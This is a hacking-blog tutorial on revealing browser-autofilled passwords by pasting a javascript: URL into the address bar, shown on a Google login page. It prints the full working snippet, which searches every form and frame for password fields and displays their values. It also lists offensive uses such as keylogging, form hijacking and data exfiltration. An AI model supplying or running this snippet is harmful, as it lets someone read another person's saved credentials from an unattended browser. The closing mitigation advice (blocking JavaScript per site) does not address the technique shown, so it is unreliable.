The Hackr
password hack

Reveal Saved Passwords in Browser using JavaScript Injection

JavaScript is a high-level, dynamic, untyped, and interpreted run-time language. Majority of websites employ it, and all modern web browsers support it without the need of any plugins. But along with this comes some additional security issues that need to be thought of and tested for.

JavaScript can be used not only for good purposes, but also for malicious purposes.
The primary application of JS is to write functions that are embedded in or included from html pages and that interact with Document Object Model or often abbreviated as DOM element of the page. So, this allows all of what we see to happen, and for our browser to be manipulated. You can also see our tutorial for alternative way of revealing saved passwords in the browser.

So, in what ways we can use JavaScript as a Pentester?

  • JavaScript HTML form modification
  • JavaScript Cookie modification
  • Injection JavaScript into existing pages
  • Keystroke logging
  • Capturing clicks
  • Hijacking form submit
  • Setting up event listeners
  • Stealing auto-complete data
  • Data ex-filteration using XMLHttpRequest
  • CSRF token stealing

Demo

So, today we are going to do a cool, quick JavaScript hack that can reveal browser passwords that are stored in the browser.

Step 1 Open the desired website login-page

Go to the website url which you want to reveal the saved password using JS injection technique. In my case it is ‘Google login’. So, now we can the see the auto-fill has already filled the password-field with the asterisks or the dots.

password hacking

Let say the url here is –
https://accounts.google.com/signin/v2/sl/pwd?hl=en&passive=true&continue=https%3A%2F%2Fwww.google.co.in%2F%3Fauthuser%3D2&flowName=GlifWebSignIn&flowEntry=AddSession&cid=0&navigationDirection=forward

Step 2 Code for JavaScript Injection

Now that we are at the login page with password field already filled with asterisks, now rewrite the whole url in the address bar with –
javascript: var p=r(); function r(){var g=0;var x=false;var x=z(document.forms);g=g+1;var w=window.frames;for(var k=0;k<w.length;k++) {var x = ((x) || (z(w[k].document.forms)));g=g+1;}if (!x) alert('Password not found in ' + g + ' forms');}function z(f){var b=false;for(var i=0;i<f.length;i++) {var e=f[i].elements;for(var j=0;j<e.length;j++) {if (h(e[j])) {b=true}}}return b;}function h(ej){var s='';if (ej.type=='password'){s=ej.value;if (s!=''){prompt('Password found ', s)}else{alert('Password is blank')}return true;}}

Note

Don’t forget to include javascript: tag at the start of the injection code!

Step 3 Saved password popup

So, now a pop-up pops up right in the browser revealing the saved password!

password hack

How to save yourself from JavaScript Injection

There are indeed a lot of measures you can choose from to save yourself from these kind of hacks.
The easiest way is to disable javascript permission for certain login pages which you feel that are vulnerable for this kind of hack.

Simple yet instant way –

password hack
You can simple do it by right-clicking on the page settings and disable the javascript permissions by selecting the ‘Always block on this site’ in the drop-menu  as shown in the below figure!

password hacking

If you guys find this helpful, let us know in the comments below!

Sreehas

The hacking trend these days has definitely turned criminal because of e-commerce ¯\_(ツ)_/¯

up